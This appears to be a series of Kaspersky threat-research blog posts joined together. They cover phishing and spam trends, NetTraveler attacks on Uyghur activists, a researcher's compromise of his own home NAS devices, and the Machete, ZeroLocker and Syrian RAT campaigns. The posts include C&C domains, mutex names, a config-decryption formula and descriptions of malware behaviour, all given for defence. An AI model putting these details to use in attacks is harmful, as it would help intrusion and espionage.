The number of fraudulent links to Windows Live, the global portal of the Microsoft services (including Outlook), grew significantly in July. The attractiveness of this resource for fraudsters is easily explained because of the popularity of the MS services and especially with the fact that they are accessed from a single account. Phishing pages are usually designed as an entry page to Outlook (currently there is also a fake login page to live.com).
An example of the phishing page imitating the Outlook entry page
Interestingly, many recent phishing pages still use the old Hotmail design despite the fact that Outlook replaced it as far back as the beginning of 2012. However, it does not seem to worry users very much: they still jump at the bait of such phishing pages.
An example of phishing on live.com using the outdated Hotmail designConclusion
The proportion of spam in global email traffic in July increased 2.2 percentage points and averaged 67%.
Spam emails advertising services that would send messages to users' phones and emails tried to capitalize on the Ramadan festivities while new customers were lured with holiday discounts and favorable offers. "Nigerian" scammers spread emails in English and Arabic asking for assistance in investing money. There were also offers of beauty products and services.
In July, the list of the most popular sources of spam around the world was topped by the US (15.3%), Russia (%5.6%) and China (5.3%).
In July 2014, Kaspersky Lab's anti-phishing component registered 20,157,877 detections. Phishers attacked users in Brazil most often: 18.2% Brazilian computers flagged at least one phishing alert during the month. The Global Internet portals category continued to top the rating of organizations most often attacked by phishers (29.5%). Financial phishing accounted for 41.85% of all attacks, a 7.86 pp growth compared with the previous month.
The rating of the most popular malicious attachments distributed via email was topped by Trojan.Win32.Yakes.fize. Germany remains the country with the highest number of antivirus detections (11.7%).
A significant number of malicious attachments imitated fake notifications in Portuguese allegedly sent on behalf of the popular smartphone messenger WhatsApp. These attachments targeted the financial data of users in Brazil and Portugal.
Last week, GReAT LatAm had the pleasure of participating in the Fourth Latin American Security Analysts Summit in Cartagena, Colombia. We were joined by 29 journalists from 12 different countries throughout the region and a guest speaker. This is one of our favorite events as it presents a rare opportunity to discuss ongoing research with journalists one-on-one and address security concerns at a regional level. The LatAm focus of the event allows us to examine the 'latin flavor' of cybercrime and cyberespionage originating within our borders.
The Summit was divided into two days. The first day involved presentations ranging from the evolution of the threat landscape to issues involving wearable devices, the disturbing trend of 'camfecting', and new tendencies in Brazilian trojan bankers now aided by cooperation with Eastern European cybercriminals. The second day largely revolved around APTs and cyberespionage campaigns as well as mobile threats affecting integration with the cloud.
The ever-charismatic Fabio Assolini discussed a favorite topic of his, the development of banking trojans in his native Brazil. The country is known for its carder culture and widespread cybercrime. Interesting figures presented included the correlation between the cost of Zeus and Caberp and their infection rates in the region, as we witness an exhorbitant rise in the rate of infection once their respective source codes leak and effectively eliminate the initial investment on the part of the criminals. Fabio also unveiled the link between Brazilian and Eastern European cybercriminals who are now exchanging knowledge through online resources to enhance their crimes.
Our very own Santiago Pontiroli took to the stage to discuss mobile- and cloud-based attack vectors in a presentation rife with Orwellian parallels and forewarnings. Santiago discussed Latin America's proclivity for piracy and pornography as presenting massive opportunities for cybercriminals fully willing to exploit them.
Android, a platform enjoying wide-adoption in the region is also an increasingly appealing target for cybercriminals as evidenced by the fact that 98% of mobile malware detected in 2013 were aimed at Android devices –a number that doubled in the first quarter of 2014! Many of these devices are now integrated with the cloud which breathes new life into old phishing schemes whose pay-off now includes extensive access to personal data, storage, and even real-time location information. Some criminals have gone so far as to misuse manufacturer recovery services to act as pre-installed ransomware.
Roberto Martinez and I took on the topic of wearable technologies, increasingly popular devices that collect all kinds of stats about their users, store personal information, and are designed to be worn continuously. I focused on the Samsung Galaxy Gear 2 smartwatch and the ease with which it can be misused by deviants in the 'creepshots' community, as rooting and executing a handful of commands disables camera alerts and recording limitations. Roberto focused on Google Glass whose integrated wifi capability leaves it susceptible to tried-and-true sniffing to expose some of the traffic being relayed to the device.
Emphasizing that the design itself of wearable devices has a propensity to embolden well-known methods of attack as users have limited access to information regarding altered applications or suspicious connections. As wearable devices function by linking with a mobile device, they can eventually become an interesting means for persistent attacks as they are capable of interacting with the information on our phones without being subject to the security measures of their master devices.
Evolving Threats in Cyberespionage
On the cyberespionage front, we saw two thought-provoking and exciting presentations:
We were joined by Jaime Blasco, Director of Research at Alienvault and a close friend of GReAT. Jaime discussed an overview of APT campaigns over the past decade, the measures developed to understand them, and traits that help categorize the work of recurring nationstate players.
Dmitry Bestuzhev announced GReAT's discovery of the first ever cyberespionage campaign of Latin American origin! The Machete campaign affected military, diplomatic, and governmental institutions in 15 countries, primarily Venezuela, Ecuador, and Colombia. Interestingly, though LatAm has been considered by many as lacking the infrastructure for sustained cyberespionage, research revealed that the campaign has been active since 2010.
Finally, no Kaspersky event would be complete without an active entertainment day for all participants. We retreated to the Cartagena Golf Club for an afternoon of activities ranging from kayaking and beach volleyball to cocktail-making, dance lessons, and guided flower arrangements, as well as a massage area. The evening concluded with a gala dinner accompanied by the traditional music and dances of Colombia and closing words from our thoughtful organizers. I hope you can join us next year!
For more follow me on twitter: @juanandres_gs
Earlier this year, we observed an uptick in the number of attacks against Uyghur and Tibetan supporters using an updated version of the NetTraveler backdoor.
Here's an example of a targeted spear-phishing e-mail directed at Uyghur activists in March 2014.
The e-mail has two attachments, a non-malicious JPG file and a 373 KB Microsoft Word .DOC file.File name "Sabiq sot xadimi gulnar abletning qeyin-Qistaqta olgenliki ashkarilanmaqta.doc" MD5 b2385963d3afece16bd7478b4cf290ce Size 381,667 bytes
The .DOC file, which in reality is a "Single File Web Page" container, also known as "Web archive file", appears to have been created on a system using Microsoft Office - Simplified Chinese.
It contains an exploit for the CVE-2012-0158 vulnerability, detected by Kaspersky Lab products as Exploit.MSWord.CVE-2012-0158.db.
If run on a vulnerable version of Microsoft Office, it drops the main module as "net.exe" (detected by Kaspersky Lab products as Trojan-Dropper.Win32.Agent.lifr), which in turn installs a number of other files. The main C&C module is dumped into "%SystemRoot%\system32\Windowsupdataney.dll", (detected by Kaspersky as Trojan-Spy.Win32.TravNet.qfr).Name WINDOWSUPDATANEY.DLL MD5 c13c79ad874215cfec8d318468e3d116 Size 37,888 bytes
It is registered as a service (named "Windowsupdata") through a Windows Batch file named "DOT.BAT" (detected by Kaspersky Lab products as Trojan.BAT.Tiny.b):
To make sure the malware isn't running multiple times, it uses the mutex "SD_2013 Is Running!" to mark its presence in the system. Other known mutexes used by older and current variants include:
- Boat-12 Is Running!
- DocHunter2012 Is Running!
- Hunter-2012 Is Running!
- NT-2012 Is Running!
- NetTravler Is Running!
- NetTravler2012 Is Running!
- SH-2011 Is Running!
- ShengHai Is Running!
- SD2013 is Running!
The malware configuration file is written to the "SYSTEM" folder (as opposed to SYSTEM32) and has a slightly new format compared to "older" NetTraveler samples:
For the record, here's what an older NetTraveler config file looks like:
Obviously, the developers behind NetTraveler have taken steps to try to hide the malware's configuration. Luckily, the encryption is relatively simple to break.
The algorithm is as follows:
decrypted[i]=encrypted[i] - (i + 0xa);
Once decrypted, the new config looks like this:
One can easily see the command-and-control (C&C) server in the screenshot above, which is "uyghurinfo[.]com".
We identified several samples using this new encryption scheme. A list of all the extracted C&C servers can be found below:C&C server IP IP location Registrar ssdcru[.]com 184.108.40.206 Hong Kong, Albert Heng, Trillion Company SHANGHAI MEICHENG TECHNOLOGY uygurinfo[.]com 220.127.116.11 United States, Los Angeles, Integen Inc TODAYNIC.COM
INC. samedone[.]com 18.104.22.168 Hong Kong, Kowloon, Hongkong Dingfengxinhui Bgp Datacenter SHANGHAI MEICHENG TECHNOLOGY gobackto[.]net 22.214.171.124 Hong Kong, Sun Network (hong Kong) Limited SHANGHAI MEICHENG TECHNOLOGY worksware[.]net N/A N/A SHANGHAI MEICHENG TECHNOLOGY jojomic[.]com was
126.96.36.199 Hong Kong, Sun Network (hong Kong) Limited SHANGHAI MEICHENG TECHNOLOGY angellost[.]net was 188.8.131.52 hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY husden[.]com was 184.108.40.206 hong kong hung tai international holdings SHANGHAI MEICHENG TECHNOLOGY
We recommend blocking all these hosts in your firewall.Conclusion
This year, the actors behind NetTraveler celebrate 10 years of activity. Although the earliest samples we have seen appear to have been compiled in 2005, there are certain indicators that point to 2004 as the year when their activity started.
For 10 years NetTraveler has been targeting various sectors, with a focus on diplomatic, government and military targets.
NetTraveler victims by industry
Most recently, the main focus of interest for cyber-espionage activities revolved around space exploration, nano-technology, energy production, nuclear power, lasers, medicine and communications.
The targeting of Uyghur and Tibetan activists remains a standard component of their activities and we can assume it will stay this way, perhaps for another 10 years.
The end of each summer always gets me excited, because one of my favorite events is taking place: the Internet Law Summer School organized by ELSA - The European Law Students' Association. This summer school is the perfect opportunity to meet young, smart and talented law students and discuss privacy, security or internet threats with them.
These students will become the lawyers, prosecutors and judges of tomorrow - so it's very important for them to get them in touch with the real world problems of fighting cyber-crime and ensuring the security and privacy of personal data.
Fighting cyber-crime through all means possible has always been our mission here at Kaspersky Lab. But we can't do this alone. Sure, our products and technologies are protecting hundreds of millions of users worldwide, but stopping cyber-crime is something we can not do just by ourselves.
Cyber-crime is a huge problem worldwide and it is always very frustrating to see that those persons responsible for cyber-attacks very rarely have to face the consequences of their actions. In the last 24 hours, we've discovered more than 300.000 new viruses, trojans and worms. How many cyber-criminals have received prison sentences in the same 24 hours period?
The reason why cyber-criminals usually get away with their crimes is that both law enforcement and judicial systems around the world are having a hard time trying to keep up with the evolution of technology, or threats on the internet specifically. This is why it's so important to train law enforcement officers. This is why it's so important to train judges and prosecutors. At the end of the day, they are the ones actually fighting cyber-crime by sending cyber-criminals to jail.
This year, the main focus of the summer school was on freedom of media and private life. I focused on the privacy and security side, of course - with a workshop titled "Private life in cyberspace - securing your personal data online".
My main message? Trust and use encryption in order to thwart prying eyes - but don't forget that no matter how good the encryption you're using is, an insecure operating system will always offer the attacker the chance of accessing your data before it gets encrypted. You can't have privacy without first having good security.
Very often new terms get over-hyped in the IT security industry. At the moment we can find articles about how hackers and researchers find vulnerabilities in for example cars, refrigerators, hotels or home alarm systems. All of these things go under the term IoT (Internet of Things), and it's one of the most hyped topics in the industry. The only problem with this kind of research is that we cannot really relate to it all: it's pretty cool, detailed research, but if you as a reader cannot relate to the attacks, the research is not understood in the proper way.
We often try to predict the future with proactive research, and I think it can be important to try to predict the future and conduct proactive security research. But I think it's even more important to talk about what's relevant, and talk about threats that people can relate to. I started to think about this topic, and figured that if we can't secure ourselves against current threats, what good will it do to identify potential new future threats?
Threats are around us right now, while you're reading this document. As users in a connected digital environment we need to ask ourselves; 'What's the current threat level?' and 'How vulnerable am I?' – Especially when we start building small home office networks. A typical modern home can have around five devices connected to the local network which aren't computers, tablets or cellphones. I'm talking about devices such as a smart TV, printer, game console, network storage device and some kind of media player/satellite receiver.
I decided to start a research project and conduct research which I thought was relevant, trying to identify how easy it would be to hack my own home. Are the devices connected to my network vulnerable? What could an attacker actually do if these devices were compromised? Is my home 'hackable?'. Before I started my research I was pretty sure that my home was pretty secure; I mean, I've been working in the security industry for over 15 years, and I'm quite paranoid when it comes to applying security patches, etc. I reckoned there must be other homes that are much more hackable than mine, because I don't really have a lot of 'hi-tech' kit at home.
During my research I didn't focus on computers, tablets or cellphones, but rather on all the other devices I have connected to my network at home. To my surprise it turns out that I actually have quite a lot of different things connected to my network. Most of them were home entertainment devices: smart TV, satellite receiver, DVD/Blu-ray player, network storage devices and gaming consoles. I'm also at the moment relocating to a new house, and I've been talking with my local security company. They're suggesting I get the latest alarm system, which connects to the network and can be controlled with my mobile device… After this research, I'm not so sure it's a good idea.
Some of the devices on my network were for example:
- Network-attached storage (NAS) from famous vendor #1
- NAS from famous vendor #2
- Smart TV
- Satellite receiver
- Router from my ISP
Before conducting the research I had all devices update with the latest firmware version. During this process I also noticed that not all devices had automated update checks, which made the entire process quite tedious. As a consumer I had to manually download and install the new firmware on some of the devices, which was actually not that simple because the new firmware files were not that easy to find, and the entire update process wasn't very suitable for a normal computer user. Another interesting observation was that most of the products were discontinued more than a year back or simply didn't even have any updates available. This got me thinking… do these home business and entertainment products only 'live' for about a year before they get discontinued?The goal
So what am I trying to prove with this research? Let me explain why I think this is important research. When I started this project I soon noticed that I could take several different approaches to the research, but for me the main goal I wanted to achieve was to see how vulnerable our homes really are, and also identify real, practical and relevant attack vectors to prove just that.
In general we're quite good at protecting our endpoints and use security software to help us do so. We also become aware from newspapers and blogs about how to raise our security level. Most people today know what a computer virus is, that we should have strong passwords, and that it's important to install the latest security patches; but do we really think about all aspects? It's quite common for a security researcher to talk about a locked door on a glass house, and I wanted to have a similar approach with this research. I wanted to demonstrate that even with an IT-security mindset we focus on protecting our endpoints, and tend to forget that there are other devices connected to our networks. We want to prevent people hacking or infecting our computers because we don't want our data to be stolen, but we then go home and do a full backup of our data to a device that's even more vulnerable than our computer.
The audience for this research is not only consumers but also companies. We need to understand that EVERYTHING we connect to the network might be a stepping stone for an attacker, or may even become an attacker's invisible 'base' that he/she will use to regain access to your network after its been compromised. Just imagine a scenario where you notice you've been compromised, you do everything in the book to bring it back to normal again, you backup your data, re-install your devices and make sure that the new installation is protected against malicious code and all updates are installed; but then six months later you get compromised again, and all your new data is stolen again… How would that even be possible?
The attacker might have compromised your network storage device and turned it into a backdoor. The malicious software is undetected because there's no protection against malicious code running on that device, and the malicious software cannot be deleted because you don't have permission to access the file system on the device; not even a factory reset would solve the problem. Or it might be that the attacker actually used your compromised smart TV to regain network access to your corporate network, since the TV is connected to the same network as your employees, and there are no network restrictions for the smart TV.
The goal with my research was to try to be the baddie, to use my home entertainment devices for malicious intentions, to actually compromise them and use them as either stepping stones to launch further attacks or as a backdoor in my own network.
What I did not try to do in this report is bash or criticize any vendor; the devices that were tested during this research were my own personal devices, and that's the reason those devices were chosen for this project. All vulnerabilities have been reported to the respective vendors, and they're working on solutions for these products. I will not disclose all the vulnerabilities that were identified in this research or any technical details about the vulnerabilities because that will only help the bad guys. If you want further technical details regarding the research project feel free to contact us.The impact
So, I had all these different devices connected to my network, but where was I to I start? I decided to begin by defining the different attack scenarios I would include in my research rather than just attacking these devices without any criteria. One or all of the following criteria had to be achieved to consider the test successful:
- To obtain access to the device; for example, to get access to files on the network storage devices;
- To obtain administrative access to the device, not just in the administrative interface, but also at the OS level;
- To be able to transform/modify the device for my personal interest (backdoor, stepping stone, etc.).
There are probably loads of other scenarios that could be useful to test, but my time was limited and I simply needed to prove a point. I started out by just fooling around with the web interfaces for the different devices and to my surprise it didn't take long before I had found remotely exploitable command execution vulnerabilities with full administrative permissions at the OS level on both network storage devices.
At this point I asked myself, 'is it really that easy?' I then thought about the two newly discovered vulnerabilities and realized both were in the administrative interface after authenticating as the administrative user. I needed to have the same preconditions as the attacker. So I tried to find vulnerabilities without using any of my access credentials. At this point it was a little bit harder, but after some poking around I found the main configuration file – it was available remotely to any user on the network. In the configuration file all the password hashes were stored, which made it real easy to obtain the administrative interface again and then use the vulnerabilities I found before to execute system commands on the device.
After further poking around I found more vulnerabilities, which could also be exploited without authentication to execute system commands as root (highest privileges) on the device. At this point it was more or less game over for both of the network storage devices; I didn't just have access to the entire file system of the devices, it was also very easy for me to infect the devices with some Trojan or backdoor that would turn the devices into zombies in a botnet – or give the attacker a backdoor to, for example, carry out further attacks from the device.
Both compromised devices where running a Linux 2.6.x kernel, and a lot of interpreters such as perl and python. One of them also had the GNU C compiler installed, which would make the attackers' life much easier. Since one of my attack scenarios was to transform the compromised device into a backdoor, I simply used one of the public IRC bots as my test case. Within seconds I had turned my network storage device into a zombie in a botnet.
This was extremely easy because the compromised network storage device is used to store files, so I could simply upload my malicious file and place it outside the shared folders somewhere else on the file system, which results in the owner of the device not being able to delete the file without using the same vulnerabilities we used to both upload and execute our IRC Trojan.
After researching the network storage devices I found over 14 vulnerabilities that would allow an attacker to remotely be able to execute system commands with the highest administrative privileges. The two devices did not just have a vulnerable web interface, but the local security on the devices was also very poor. The devices had very weak passwords, a lot of configuration files had incorrect permissions, and they also contained passwords in clear text.
To give you another example on how bad the local security was, I can tell you that on one of the storage devices the administrative root password was '1'. I do understand that these devices are not built with Fort Knox security in mind, but to have a one character-long password is against all reasonable rules.
Due to the poor security, and the fact that I had access to the file system, it was also very simple to identify several scripts which enabled features in the device that weren't documented anywhere. Functions which allowed an external user to enable services and other interesting things on the devices such as remote admin interfaces (telnetd, sshd). I might write more about these 'hidden' features in a different post because I need to conduct deeper research regarding these files.
During the research project I stumbled upon some other devices that had 'hidden' features; one of those devices was my DSL router which was provided by my ISP. After I logged in using the admin credentials I received from the ISP I could navigate around the web interface. The interface was pretty simple to use, and I quickly noticed how the URL changed when I navigated through the menu. Each function in the menu was assigned a number; the first function in the menu had the numeral 0, and then it incremented with one for each option. The interesting thing was that sometimes a function jumped to an unexpected number and a few numbers were missed, but when you then entered the missed numbers in the URL address bar you were prompted with a menu option that didn't exist in the menu list, but the name of that 'hidden' function was displayed in the web interface.
I started to brute force these numbers, and found that there were tons of functions I didn't have access to. I just assume that my ISP or the vendor have FULL CONTROL over the device, and can do anything they want with it and access all these functions I don't have permission to use. By just looking at the 'hidden' function names it seems that the ISP can for example create tunnels so as to connect to any device on the network. Just imagine if these functions fell into the hands of the wrong people? I understand that these functions are most likely supposed to be helping the ISP perform support functions, but when you log in using the administrative account you don't have full control over what you consider is your own device, and thus it becomes quite scary. Especially when some of the names have equally scary names like 'Web Cameras', 'Telephony Expert Configure', 'Access Control', 'WAN-Sensing' and 'Update'.
Below are some screenshots of these hidden functions.
I'm currently still researching these things to see what the functions really do. If I find anything interesting I'm pretty sure there'll be another blog post.
Meantime, I started to examine the other devices connected to my home network; for example, my Dreambox: it still had the default username and password, which was also the administrative root account on the device! The device runs Linux, which would be an easy target for an attacker. Most of the other devices were pretty secure but an entire audit of these kinds of devices would be difficult because you need to find alternative ways to determine if an attack was successful or not since you don't have full access to most of the devices.
After a few days of poking around I still hadn't found anything that would cover the three scenarios – nothing really worth mentioning. The research project was also quite difficult to perform because I was auditing my personal devices, and I didn't want to break anything. I had naturally paid for all these devices out of my own pocket!
I had to take a different approach and at this point I had to get creative. I had to play with the idea that I'm the attacker, and I've already compromised the two network storage devices, and so what can I do next?' My first thought was to see if I could do something with the media players (smart TV and DVD player) because they're most likely reading information from the storage devices (which I'd already compromised). At this point I was researching potential code execution vulnerabilities with the smart TV and DVD player, but due to the high price I paid for the devices I wasn't able to investigate this further. It wasn't only a question of the wasted money if I were to break my brand new LED smart TV, but also I had no idea of how I would explain my wrecking the telly to the kids; how were they going to watch Scooby Doo?
I decided to stop researching them, and spent some time contacting the different vendors to see if the vulnerabilities were actually exploitable and work together with the vendors to verify these potential security issues. It's much easier for them to do it since they have access to the source code and can confirm if the vulnerability is valid or not much quicker (and I guess they don't really care of they break any devices).
At first I had some trouble contacting these vendors because on the websites there's little useful contact information for the engineers or C-level people who would be able to help me get through to the appropriate people. After some lurking around and asking people in my professional network I was finally able to get in contact with the people I needed and they were very grateful for the information I could share regarding the vulnerabilities and research approaches.
We are now trying to identify if we would be able to transform the smart TV and DVD/Blu-ray player into the same type of stepping stone and backdoor as the compromised storage devices. More information will be shared on this topic later since this research project is ongoing.
For the most of my life I was a total security junkie, doing everything from working as a penetration tester to a public speaker and adviser for law enforcement agencies. IT security is really one of my biggest passions in life, but for the last few years I seem to have reached a point in my life where I'm actually quite tired of reading the same security bulletins year after year. It's time we start doing something about the problems, and one thing we can do is start talking about security threats that are relevant, and also in a language that will make everyone understand them. We as security experts need to take more responsibility and talk about threats that are relevant today – threats that affect you and me. We also need to come up with smart and simple suggestions, conclusions and solutions on how to mitigate those threats by using the software and technology that we already have.
I've always been fascinated by new vulnerabilities and exploitation techniques, but to be honest, what good does it do only releasing vulnerability information when we're not making people understand the bigger picture. We think that IT security is all about software vulnerabilities and I know that half of this post is only talking about vulnerabilities, but the goal with this research is not to brag about all the undiscovered vulnerabilities I found, or that there are big security problems in the home entertainment product line. There will always be vulnerabilities, and we need to understand that; however, by understanding I don't mean accepting. What I mean is that we need to actually do something about it; we need to know what the impact is and assume that our devices can be, or are already, compromised. We need to start assuming that products are vulnerable and that attackers can and will gain access to them.
I would like to conclude this research by saying that we as individuals and also companies need to understand the risks with network devices. We also need to understand that our information is not secure just because we have a strong password or are running some protection against malicious code. We also need to understand that there are so many things that we do not have control over, and that we are largely in the hands of the software and hardware vendors. It took me less than 20 minutes to find and verify extremely serious vulnerabilities in a device considered to be secure – a device we trust and on which we store all the information we don't want stolen.
I remember when I proposed this research to my boss; he asked me what I thought the outcome would be. I was not developing new security solutions for home entertainment devices; I was only identifying security problems, so the only answer I could give him was that I wanted to conduct this research to make people aware that there is a problem, and that we as individuals need to try and improve our personal security in different ways to how it was done in the past; we need to change our mindset and the whole game!
I would also like to give some feedback to all the vendors out there: we need to come up with a better way to support and secure your products. It's not really acceptable that a product is considered as discontinued after only 12 months; it's not okay to have one character passwords; and it's not okay to think of these devices just as 'entertainment' devices. It's not okay to have a readable configuration file containing all user credentials – especially on a network storage device.
We need to come up with alternative solutions that can help individuals and companies improve their security. This is not a problem you simply can fix by installing a product or security patch; therefore, I would like to end this post by saying that even though the home entertainment industry might not be focused on security, we at KL do, and with just a few simple tips I think we can raise the security level a little bit higher. Hopefully some of the vendors will read this research and improve their software security; but until then, here are some simple tips from my side:
- Make sure all your devices are up to date with all the latest security and firmware updates. This is a problem for a lot of home business and entertainment devices, but it is still the best thing you can do to avoiding being at the mercy of known vulnerabilities. It also gives you an indication of whether the devices have any updates at all to install, or if it's considered to be a 'dead' product.
- Make sure that the default username and password are changed; this is the first thing an attacker will try when attempting to compromise your device. Remember that even if it's a 'stupid' product such as a satellite receiver or a network hard drive, the administrative interfaces are often vulnerable to serious vulnerabilities.
- Use encryption, even on the files you store in your network storage device. If you do not have access to an encryption tool, you can simply put your files in a password-protected ZIP file; it's still better than not doing anything at all.
- Most home routers and switches have the possibility to set up several different DMZ/VLAN. This means that you can setup your own 'private' network for your network devices, which will restrict network access to and from this device.
- Use common sense and understand that everything can be hacked, even your hardware devices.
- If you're really paranoid you can always monitor the outbound network traffic from these devices to see if there's anything strange going on, but this does require some technical knowledge. Another good tip is to restrict network devices from accessing sites they're not supposed to access, and only allow them to pull updates and nothing else.
Some time ago, a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown, undetected malware. While assisting the customer, we found a very interesting file in the system that is completely unrelated to China and contained no Chinese coding traces. At first look, it pretends to be a Java related application but after a quick analysis, it was obvious this was something more than just a simple Java file. It was a targeted attack we are calling "Machete".What is "Machete"?
"Machete" is a targeted attack campaign with Spanish speaking roots. We believe this campaign started in 2010 and was renewed with an improved infrastructure in 2012. The operation may be still "active".
The malware is capable of the following cyber-espionage operations:
- Logging keystrokes
- Capturing audio from the computer's microphone
- Capturing screenshots
- Capturing geolocation data
- Taking photos from the computer's web camera
- Copying files to a remote server
- Copying files to a special USB device if inserted
- Hijjacking the clipboard and capturing information from the target machine
Most of the victims are located in, Venezuela, Ecuador, Colombia, Peru, Russia, Cuba, and Spain, among others. In some cases, such as Russia, the target appears to be an embassy from one of the countries of this list.
Targets include high-level profiles, including intelligence services, military, embassies and government institutions.How does "Machete" operate?
The malware is distributed via social engineering techniques, which includes spear-phishing emails and infections via Web by a fake Blog website. We have found no evidence of of exploits targeting zero-day vulnerabilities. Both the attackers and the victims appear to be Spanish-speaking.
During this investigation, we also discovered many other the files installing this cyber-espionage tool in what appears to be a dedicated a spear phishing campaign. These files display a PowerPoint presentation that installs the malware on the target system once the file is opened. These are the names of the PowerPoint attachments:
- Hermosa XXX.pps.rar
- El arte de la guerra.rar
- Hot brazilian XXX.rar
These files are in reality Nullsoft Installer self-extracting archives and have compilation dates going back to 2008.
A consequence of the embedded Python code inside the executables is that these installers include all the necessary Python libraries as well as the PowerPoint file shown to the victim during the installation. The result is extremely large files, over 3MB.
Here are some screnshots of the mentioned files:
A technical relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. This is very unusual and does not have any advantage for the attackers except ease of coding. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component.
Both attackers and victims speak Spanish natively, as we see it consistently in the source code of the client side and in the Python code.Indicators of Compromise Web infections
The following code snippets were found into the HTML of websites used to infect victims:
Also the following link to one known infection artifact:
The following are domains found during the infection campaign. Any communication with them must be considered extremely suspicious
blogwhereyou.com (sinkholed by Kaspersky Lab)
grannegral.com (sinkholed by Kaspersky Lab)
Creates the file Java Update.lnk pointing to appdata/Jre6/java.exe
Malware is installed in appdata/ MicroDes/
Running processes Creates Task Microsoft_upHuman part of "Machete" Language
The first evidence is the language used, both for the victims and attackers, is Spanish.
The victims are all Spanish speaking according to the filenames of the stolen documents.
The language is also Spanish for the operators of the campaign, we can find all the server side code written in this language: reportes, ingresar, peso, etc.Conclusion
The "Machete" discovery shows there are many regional players in the world of targeted attacks. Unfortunately, such attacks became a part of the cyber arsenal of many nations located over the world. We can be sure there are other parallel targeted attacks running now in Latin America and other regions.
Kaspersky Lab products detect malicious samples related to this targeted attack as Trojan-Spy.Python.Ragua.
Note: A full analysis of the Machete attacks is available to the Kaspersky Intelligent Services customers. Contact: firstname.lastname@example.org
In recent times we've been seeing a lot of file-encrypting ransomware activity.
One of the new ones we've seen pop up in the last couple weeks is called ZeroLocker. There's indication the C&C configuration contains some errors which would prevent successful decryption. This is why we urge people not to pay up even more so than normal.
So far we've observed a limited amount of detections through our Kaspersky Security Network. The actors behind ZeroLocker are initially asking $300 worth of BTC for decrypting the files. This goes up to $500 and $1000 as time passes:
ZeroLocker adds a .encrypt extension to all files it encrypts. Unlike most other ransomware ZeroLocker encrypts virtually all files on the system, rather than using a set of pre-defined filetypes to encrypt. It doesn't encrypt files larger than 20MB in size, or files located in directories containing the words "Windows", "WINDOWS", "Program Files", "ZeroLocker" or "Desktop". The malware gets executed at boot from C:\ZeroLocker\ZeroRescue.exe.
Though there's a Bitcoin wallet hardcoded inside the binary the malware tries to fetch a new wallet address from the C&C. This is most likely done to make it more difficult to trace how successful the operation is and where the money goes.
We've gathered several Bitcoin wallet addresses and at the time of writing none had any transactions associated with them. As the C&C server is providing the Bitcoin wallet information it's possible the attackers are able to use a unique wallet for each victim.
The malware generates one random 160-bit AES key to encrypt all the files with. Due to the way the key is generated the key space is somewhat limited, though still large enough to make general brute forcing unfeasible. After encryption the malware runs the cipher.exe utility to remove all unused data from the drive, making file recovery much harder. The encryption key, together with a CRC32 of the computer's MAC address, and the associated Bitcoin wallet is sent to the server.
Interestingly enough, the encryption key along with the other information is sent through a GET request, rather than a POST. This results in a 404 on the server. This could mean that the server is not storing this information. That means victims who pay up may likely not see their files restored.
Several other URLs that the malware tries to get result in 404s as well, which indicates this particular operation may still be in its infancy. When those errors are fixed we may see ZeroLocker deployed on a larger scale. These operations rely on people paying up. Don't do it. Make sure you have backups instead.
We detect current ZeroLocker samples as Trojan-Ransom.MSIL.Agent.uh.
The geopolitical conflicts in the Middle East have deepened in the last few years. Syria is no exception, with the crisis there taking many forms, and the cyberspace conflict is intensifying as sides try to tilt the struggle in their favor by exploiting cyber intelligence and using distortion.
The Global Research & Analysis Team (GReAT) at Kaspersky Lab has discovered new malware attacks in Syria, using some techniques to hide and operate malware, in addition to proficient social engineering tricks to deliver malware by tricking and tempting victims to open and launch malicious files. The malware files were found on activist sites and social networking forums, some other files were also reported by local organizations like CyberArabs and Technicians for Freedom.
The full report detailing the attacks and related activities can be found here.A glance at what was discovered
The number of attacks and malicious files being distributed is constantly increasing as the attackers become more organized and proficient. The samples are all based on Remote Administration Trojan Tools (RATs)
The number of malicious files found: 110
The number of domains linked to the attacks: 20
The number of IP addresses linked to the attacks: 47
Masquerading as a reportedly "Government leaked program" that has the names of all wanted people in Syria, the National Security Program conceals a full featured RAT client to steal all sorts of information under one of its buttons.
برنامج الأمن الوطني.exe (The national security program)Using shockingly disturbing videos to distribute malware
A disturbing video showing injured victims of recent bombings was used on YouTube to appeal to people's fear and prompt them to download a malicious application available on a public file sharing website. After initial analysis, the file named "فضائح .exe" (Scandals.exe) proved to be heavily obfuscated with the commercial utility "MaxToCode" for .NET in order to avoid early detection by antivirus solutions.
If you thought the era of fake antiviruses was over, here comes this newly developed Syrian sample to challenge your beliefs. With the innocent title of "Ammazon Internet Security", this malicious application tries to mimic a security scanner, even including a quite thorough graphical user interface and some interactive functionality.
Total Network Monitor (which is a legitimate application) is inside another sample found, being used with embedded malware for spying purposes. Offering security applications to protect against surveillance is one of the many techniques used by malware writing groups to get users desperate for privacy to execute these dubious programs.
It's also the case with other samples, where social engineering does all the heavy work. Instant messaging applications for desktop operating systems have been used in the past to spread malware and it seems Syrian malware authors have jumped on the bandwagon.
Another of the attacks using social engineering tricks, the sample named Kimawi.exe (Arabic for Chemicals) with a JPG icon, is a RAT file bound to the image Kimawi.jpg. The picture is a previously leaked paper supposedly from the regime in Syria warning military units to prepare for Chemical Attacks. The file is being sent by email to selected victims.
The threat actors are becoming more organized, the number of attacks is increasing and the samples being used are becoming more sophisticated, while also relying extensively on powerful social engineering tricks that many people fall for.Where are the victims and the attackers?
The victims infected when accessing the hacked forums and social networking sites tend to be ordinary users or activistshey were, or specific targets if they receive the malware via email, Skype, or messages on social networking sites.
The victims are also located outside Syria. We have seen victims of Syrian-based malware in:
- Saudi Arabia
- United Arab Emirates
- United States
The attackers' command and control centers were tracked to IP addresses in Syria, Russia, Lebanon, the US and Brazil.How many have fallen victim?
We believe the number of victims exceeds 10,000, with some of the files being downloaded more than 2000 times.
The attackers' malware samples and variations have increased dramatically from only a few in Q1 2013 to around 40 in Q2 2014.What is the impact on victims?
Remote Administration Trojans tools are used to fully compromise the system on victim devices. RATs are capable of stealing user credentials in addition to activating camera and microphone functionalities...Are users protected?
Kaspersky detects and blocks all the samples that have been found. They are detected as follows:
More details and analysis of the attacks and malware samples can be found in the full report here.
